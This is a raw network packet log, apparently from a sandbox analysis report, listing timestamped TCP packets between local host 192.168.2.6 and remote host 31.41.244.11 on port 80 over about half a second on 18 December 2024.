                                                                                                                                                              Dec 18, 2024 11:47:15.813270092 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.814217091 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.814261913 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.814693928 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.814739943 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.815432072 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.815478086 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.815859079 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.815900087 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.816559076 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.816605091 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.816901922 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.816952944 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.817717075 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.817760944 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.817914963 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.817959070 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.818922043 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.818969011 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.819005013 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.819047928 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.948775053 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.949104071 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.949224949 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.949377060 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.949389935 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.949433088 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.951082945 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.951292992 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.951332092 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.952238083 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.952286959 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.953386068 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.953711987 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.953752041 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.953896999 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.954200029 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.954200983 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.954418898 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.954468966 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.955152035 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.955517054 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.955626965 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.956199884 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.956250906 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.956285954 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.957436085 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.957492113 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.957573891 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.958199978 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.958849907 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.959131002 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.959183931 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.959906101 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.960000992 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.960055113 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.961035013 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.961085081 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.961111069 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.961524963 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.962074995 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.962279081 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.962285995 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.962435007 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.963191986 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.963258982 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.963453054 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.963509083 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.964411974 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.964474916 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.964941025 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.964993954 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.965595961 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.965909004 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.965948105 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.966021061 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.966747046 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.966801882 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.966833115 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.966877937 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.968105078 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.968159914 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.968166113 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.968195915 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.969254971 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.969321966 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.969760895 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.969927073 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.970670938 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.970730066 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.971055984 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.971292973 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.971590042 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.971642971 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.971723080 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.971769094 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.972661972 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.972675085 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.972722054 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.973903894 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.973961115 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.974142075 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.974195957 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.974945068 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.975001097 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.975287914 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.975339890 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.976181984 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.976232052 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.976257086 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.976309061 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.977252960 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.977718115 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.977777004 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.978543997 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.978713036 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.978766918 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.979650021 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.979700089 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.979728937 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.980839014 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.980892897 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.980916977 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.982038975 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.982089043 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.982207060 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.983266115 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.983283043 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.983320951 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.983344078 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.984314919 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.984371901 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.984724045 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.984772921 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.985471964 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.985522985 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.985698938 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.985743046 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.986927032 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.986975908 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.987029076 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.987904072 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.987947941 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.987994909 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.988986969 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.989201069 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.989249945 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.990187883 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.990235090 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.990410089 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.991365910 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.991411924 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.991481066 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.992507935 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.992559910 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.992594004 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.992636919 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.993727922 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.994216919 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.994966984 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.994981050 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.994997978 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.995039940 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.995080948 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.996022940 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.996078014 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.996500015 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.997209072 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.997257948 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.997286081 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.998199940 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.998369932 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.998847008 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.998894930 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.999592066 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.999919891 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.999967098 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.000798941 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.000889063 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.000938892 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.001888037 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.001938105 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.002563953 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.003051996 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.003098011 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.003222942 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.004219055 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.004268885 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.004357100 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.004401922 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.005508900 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.005767107 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.005815983 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.006609917 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.006719112 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.006769896 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.007726908 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.007770061 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.008057117 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.008145094 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.008910894 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.009396076 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.009444952 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.010072947 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.010119915 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.010166883 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.142720938 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.142879009 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.143049002 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.143244028 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.144072056 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.144130945 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.144454002 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.144468069 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.144505978 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.145692110 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.146003962 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.146051884 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.146064997 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.146090031 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.147114038 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.147844076 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.147901058 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.148349047 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.148422003 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.148467064 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.149451017 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.149502039 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.150675058 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.150686979 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.150717020 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.150739908 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.150753975 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.151912928 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.152059078 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.152101994 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.152972937 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.153057098 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.153105021 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.154131889 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.154197931 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.154263020 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.154510021 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.155335903 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.155396938 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.155572891 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.155622005 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.156502962 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.156567097 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.156734943 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.156889915 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.157655954 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.157852888 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.157855034 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.157896996 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.158884048 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.158896923 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.158931017 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.158945084 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.160007000 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.160161018 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.160223961 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.161204100 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.161458969 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.161520958 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.162383080 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.162409067 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.162458897 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.163511992 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.163523912 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.163558006 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.163613081 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.164721012 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.164791107 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.165250063 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.165476084 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.165838003 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.165905952 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.166019917 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.166462898 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.167030096 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.167071104 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.167239904 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.167287111 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.168195963 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.168243885 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.168942928 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.169051886 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.169373035 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.169428110 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.169651031 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.170219898 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.170572042 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.170583963 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.170620918 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.170639992 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.171794891 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.171876907 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.171931028 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.172884941 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.172979116 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.173024893 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.174053907 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.174202919 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.174206972 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.174251080 CET4980680192.168.2.631.41.244.11
